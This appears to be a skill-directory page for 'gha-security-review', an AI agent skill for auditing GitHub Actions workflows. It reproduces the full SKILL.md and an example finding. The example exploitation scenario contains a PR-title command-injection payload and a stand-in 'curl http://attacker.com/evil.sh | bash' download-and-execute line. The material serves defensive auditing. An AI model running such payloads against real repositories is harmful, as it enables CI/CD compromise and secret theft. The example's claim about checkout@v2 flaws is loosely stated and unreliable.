gha-security-review
Find exploitable vulnerabilities in GitHub Actions workflows. Every finding MUST include a concrete exploitation scenario — if you can't build the attack, don't report it.
About this skill
The `gha-security-review` skill empowers AI agents to meticulously examine GitHub Actions workflows for exploitable security vulnerabilities. Unlike generic CI/CD security tools, this skill is specifically designed to detect real-world attack patterns and exploitation vectors identified from actual GitHub Actions compromises, such as those analyzed in the HackerBot Claw campaign by StepSecurity. A core principle of this skill is that every reported vulnerability must be accompanied by a concrete, actionable exploitation scenario. This ensures that findings are practical and immediately useful for developers and security teams, preventing speculative reports and focusing on verifiable threats within the workflow logic.
Best use case
Conducting proactive security audits of GitHub Actions workflows; identifying potential supply chain attack vectors; hardening CI/CD pipelines against known exploits; educating developers on secure GitHub Actions practices; and ensuring compliance with security best practices for automated build and deployment processes.
Find exploitable vulnerabilities in GitHub Actions workflows. Every finding MUST include a concrete exploitation scenario — if you can't build the attack, don't report it.
A detailed report outlining identified security vulnerabilities within the specified GitHub Actions workflows. Each finding will include a clear description of the vulnerability, its potential impact, and a concrete, step-by-step exploitation scenario demonstrating how an attacker could leverage it. The output will be focused exclusively on GHA-specific attack patterns, enabling informed decisions for remediation.
Practical example
Example input
{"workflow_content": "name: CI\non:\n pull_request:\n types: [opened, synchronize, reopened]\n workflow_dispatch:\n\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v2 # Potentially vulnerable old version\n - name: Echo PR title\n run: echo \"PR title: ${{ github.event.pull_request.title }}\"\n - name: Dangerous command\n if: ${{ github.event_name == 'pull_request' }}\n run: |-\n echo \"Running custom script with ${{ github.event.pull_request.head.sha }}\"\n # Example of a potentially risky command if input is not sanitized or trusted\n eval \"echo Hello ${{ github.event.pull_request.title }}\"\n"}Example output
{"findings": [{"vulnerability": "Outdated actions/checkout version", "description": "The workflow uses `actions/checkout@v2`, which is known to have vulnerabilities. For example, some older versions could be vulnerable to repository metadata injection or expose secrets when processing untrusted input from fork pull requests.", "impact": "Could allow an attacker to inject malicious code into the workflow, potentially gaining access to GITHUB_TOKEN or other secrets, or manipulating the build process.", "exploitation_scenario": "1. An attacker forks the repository and creates a malicious branch.\n2. In their forked repository, they can craft a specific commit or pull request title that exploits a known vulnerability in `actions/checkout@v2` (e.g., manipulating git metadata).\n3. When the PR from the fork is opened, the workflow runs using the vulnerable `checkout@v2`, executing the malicious payload within the context of the workflow, potentially exfiltrating secrets or injecting malicious artifacts."}, {"vulnerability": "Command Injection via `eval` with unsanitized PR title", "description": "The workflow directly uses `eval` on `github.event.pull_request.title` without proper sanitization or escaping. If a pull request from an untrusted source is opened, the PR title can contain malicious shell commands.", "impact": "Arbitrary code execution within the context of the workflow, allowing an attacker to access environment variables, secrets, modify files, or trigger other actions.", "exploitation_scenario": "1. An attacker forks the repository and creates a new branch.\n2. They create a pull request with a specially crafted title, e.g., `My PR Title $(evil_command_here) #`.\n3. When the workflow runs the `Dangerous command` step, `eval` will execute `echo Hello My PR Title $(evil_command_here) #`. The `$()` syntax will cause `evil_command_here` to execute.\n4. `evil_command_here` could be `curl http://attacker.com/evil.sh | bash` to download and execute arbitrary scripts, or `echo \"GITHUB_TOKEN: $GITHUB_TOKEN\"` to exfiltrate secrets."}], "summary": "2 potential security vulnerabilities identified in the GitHub Actions workflow. Immediate review and remediation are recommended."}When to use this skill
- Before deploying new GitHub Actions workflows to production; periodically reviewing existing workflows for newly discovered attack patterns; integrating new third-party actions or complex scripts into your CI/CD pipeline; performing a security audit of your repository's automated processes; or when a security incident or breach related to CI/CD has occurred and you need to identify similar vulnerabilities.
When not to use this skill
- When the focus is on general application code security (e.g., SAST/DAST for application logic) rather than GitHub Actions specific vulnerabilities; for CI/CD platforms other than GitHub Actions; if you need to automatically remediate or fix vulnerabilities (this skill only identifies and provides exploitation scenarios); or when the security of GitHub Actions workflows is not a concern for your project.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/gha-security-review/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How gha-security-review Compares
| Feature / Agent | gha-security-review | Standard Approach |
|---|---|---|
| Platform Support | Claude | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | easy | N/A |
Frequently Asked Questions
What does this skill do?
Find exploitable vulnerabilities in GitHub Actions workflows. Every finding MUST include a concrete exploitation scenario — if you can't build the attack, don't report it.
Which AI agents support this skill?
This skill is designed for Claude.
How difficult is it to install?
The installation complexity is rated as easy. You can find the installation instructions above.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
Best AI Skills for Claude
Explore the best AI skills for Claude and Claude Code across coding, research, workflow automation, documentation, and agent operations.
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
ChatGPT vs Claude for Agent Skills
Compare ChatGPT and Claude for AI agent skills across coding, writing, research, and reusable workflow execution.
SKILL.md Source
<!--
Attack patterns and real-world examples sourced from the HackerBot Claw campaign analysis
by StepSecurity (2025): https://www.stepsecurity.io/blog/hackerbot-claw-github-actions-exploitation
-->
# GitHub Actions Security Review
Find exploitable vulnerabilities in GitHub Actions workflows. Every finding MUST include a concrete exploitation scenario — if you can't build the attack, don't report it.
This skill encodes attack patterns from real GitHub Actions exploits — not generic CI/CD theory.
## When to Use
- You are reviewing GitHub Actions workflows for exploitable security issues.
- The task requires tracing a concrete attack path from an external attacker to workflow execution or secret exposure.
- You need a security review of workflow files, composite actions, or workflow-related scripts with evidence-based findings only.
## Scope
Review the workflows provided (file, diff, or repo). Research the codebase as needed to trace complete attack paths before reporting.
### Files to Review
- `.github/workflows/*.yml` — all workflow definitions
- `action.yml` / `action.yaml` — composite actions in the repo
- `.github/actions/*/action.yml` — local reusable actions
- Config files loaded by workflows: `CLAUDE.md`, `AGENTS.md`, `Makefile`, shell scripts under `.github/`
### Out of Scope
- Workflows in other repositories (only note the dependency)
- GitHub App installation permissions (note if relevant)
## Threat Model
Only report vulnerabilities exploitable by an **external attacker** — someone **without** write access to the repository. The attacker can open PRs from forks, create issues, and post comments. They cannot push to branches, trigger `workflow_dispatch`, or trigger manual workflows.
**Do not flag** vulnerabilities that require write access to exploit:
- `workflow_dispatch` input injection — requires write access to trigger
- Expression injection in `push`-only workflows on protected branches
- `workflow_call` input injection where all callers are internal
- Secrets in `workflow_dispatch`/`schedule`-only workflows
## Confidence
Report only **HIGH** and **MEDIUM** confidence findings. Do not report theoretical issues.
| Confidence | Criteria | Action |
|---|---|---|
| **HIGH** | Traced the full attack path, confirmed exploitable | Report with exploitation scenario and fix |
| **MEDIUM** | Attack path partially confirmed, uncertain link | Report as needs verification |
| **LOW** | Theoretical or mitigated elsewhere | Do not report |
For each HIGH finding, provide all five elements:
1. **Entry point** — How does the attacker get in? (fork PR, issue comment, branch name, etc.)
2. **Payload** — What does the attacker send? (actual code/YAML/input)
3. **Execution mechanism** — How does the payload run? (expression expansion, checkout + script, etc.)
4. **Impact** — What does the attacker gain? (token theft, code execution, repo write access)
5. **PoC sketch** — Concrete steps an attacker would follow
If you cannot construct all five, report as MEDIUM (needs verification).
---
## Step 1: Classify Triggers and Load References
For each workflow, identify triggers and load the appropriate reference:
| Trigger / Pattern | Load Reference |
|---|---|
| `pull_request_target` | `references/pwn-request.md` |
| `issue_comment` with command parsing | `references/comment-triggered-commands.md` |
| `${{ }}` in `run:` blocks | `references/expression-injection.md` |
| PATs / deploy keys / elevated credentials | `references/credential-escalation.md` |
| Checkout PR code + config file loading | `references/ai-prompt-injection-via-ci.md` |
| Third-party actions (especially unpinned) | `references/supply-chain.md` |
| `permissions:` block or secrets usage | `references/permissions-and-secrets.md` |
| Self-hosted runners, cache/artifact usage | `references/runner-infrastructure.md` |
| Any confirmed finding | `references/real-world-attacks.md` |
Load references selectively — only what's relevant to the triggers found.
## Step 2: Check for Vulnerability Classes
### Check 1: Pwn Request
Does the workflow use `pull_request_target` AND check out fork code?
- Look for `actions/checkout` with `ref:` pointing to PR head
- Look for local actions (`./.github/actions/`) that would come from the fork
- Check if any `run:` step executes code from the checked-out PR
### Check 2: Expression Injection
Are `${{ }}` expressions used inside `run:` blocks in externally-triggerable workflows?
- Map every `${{ }}` expression in every `run:` step
- Confirm the value is attacker-controlled (PR title, branch name, comment body — not numeric IDs, SHAs, or repository names)
- Confirm the expression is in a `run:` block, not `if:`, `with:`, or job-level `env:`
### Check 3: Unauthorized Command Execution
Does an `issue_comment`-triggered workflow execute commands without authorization?
- Is there an `author_association` check?
- Can any GitHub user trigger the command?
- Does the command handler also use injectable expressions?
### Check 4: Credential Escalation
Are elevated credentials (PATs, deploy keys) accessible to untrusted code?
- What's the blast radius of each secret?
- Could a compromised workflow steal long-lived tokens?
### Check 5: Config File Poisoning
Does the workflow load configuration from PR-supplied files?
- AI agent instructions: `CLAUDE.md`, `AGENTS.md`, `.cursorrules`
- Build configuration: `Makefile`, shell scripts
### Check 6: Supply Chain
Are third-party actions securely pinned?
### Check 7: Permissions and Secrets
Are workflow permissions minimal? Are secrets properly scoped?
### Check 8: Runner Infrastructure
Are self-hosted runners, caches, or artifacts used securely?
## Safe Patterns (Do Not Flag)
Before reporting, check if the pattern is actually safe:
| Pattern | Why Safe |
|---|---|
| `pull_request_target` WITHOUT checkout of fork code | Never executes attacker code |
| `${{ github.event.pull_request.number }}` in `run:` | Numeric only — not injectable |
| `${{ github.repository }}` / `github.repository_owner` | Repo owner controls this |
| `${{ secrets.* }}` | Not an expression injection vector |
| `${{ }}` in `if:` conditions | Evaluated by Actions runtime, not shell |
| `${{ }}` in `with:` inputs | Passed as string parameters, not shell-evaluated |
| Actions pinned to full SHA | Immutable reference |
| `pull_request` trigger (not `_target`) | Runs in fork context with read-only token |
| Any expression in `workflow_dispatch`/`schedule`/`push` to protected branches | Requires write access — outside threat model |
**Key distinction:** `${{ }}` is dangerous in `run:` blocks (shell expansion) but safe in `if:`, `with:`, and `env:` at the job/step level (Actions runtime evaluation).
## Step 3: Validate Before Reporting
Before including any finding, read the actual workflow YAML and trace the complete attack path:
1. **Read the full workflow** — don't rely on grep output alone
2. **Trace the trigger** — confirm the event and check `if:` conditions that gate execution
3. **Trace the expression/checkout** — confirm it's in a `run:` block or actually references fork code
4. **Confirm attacker control** — verify the value maps to something an external attacker sets
5. **Check existing mitigations** — env var wrapping, author_association checks, restricted permissions, SHA pinning
If any link is broken, mark MEDIUM (needs verification) or drop the finding.
**If no checks produced a finding, report zero findings. Do not invent issues.**
## Step 4: Report Findings
````markdown
## GitHub Actions Security Review
### Findings
#### [GHA-001] [Title] (Severity: Critical/High/Medium)
- **Workflow**: `.github/workflows/release.yml:15`
- **Trigger**: `pull_request_target`
- **Confidence**: HIGH — confirmed through attack path tracing
- **Exploitation Scenario**:
1. [Step-by-step attack]
- **Impact**: [What attacker gains]
- **Fix**: [Code that fixes the issue]
### Needs Verification
[MEDIUM confidence items with explanation of what to verify]
### Reviewed and Cleared
[Workflows reviewed and confirmed safe]
````
If no findings: "No exploitable vulnerabilities identified. All workflows reviewed and cleared."Related Skills
mobile-security-coder
Expert in secure mobile coding practices specializing in input validation, WebView security, and mobile-specific security patterns.
lightning-architecture-review
Review Bitcoin Lightning Network protocol designs, compare channel factory approaches, and analyze Layer 2 scaling tradeoffs. Covers trust models, on-chain footprint, consensus requirements, HTLC/PTLC compatibility, liveness, and watchtower support.
laravel-security-audit
Security auditor for Laravel applications. Analyzes code for vulnerabilities, misconfigurations, and insecure practices using OWASP standards and Laravel security best practices.
k8s-security-policies
Comprehensive guide for implementing NetworkPolicy, PodSecurityPolicy, RBAC, and Pod Security Standards in Kubernetes.
gh-review-requests
Fetch unread GitHub notifications for open PRs where review is requested from a specified team or opened by a team member. Use when asked to "find PRs I need to review", "show my review requests", "what needs my review", "fetch GitHub review requests", or "check team review queue".
frontend-security-coder
Expert in secure frontend coding practices specializing in XSS prevention, output sanitization, and client-side security patterns.
frontend-mobile-security-xss-scan
You are a frontend security specialist focusing on Cross-Site Scripting (XSS) vulnerability detection and prevention. Analyze React, Vue, Angular, and vanilla JavaScript code to identify injection poi
fix-review
Verify fix commits address audit findings without new bugs
error-debugging-multi-agent-review
Use when working with error debugging multi agent review
django-perf-review
Django performance code review. Use when asked to "review Django performance", "find N+1 queries", "optimize Django", "check queryset performance", "database performance", "Django ORM issues", or audit Django code for performance problems.
django-access-review
django-access-review
differential-review
Security-focused code review for PRs, commits, and diffs.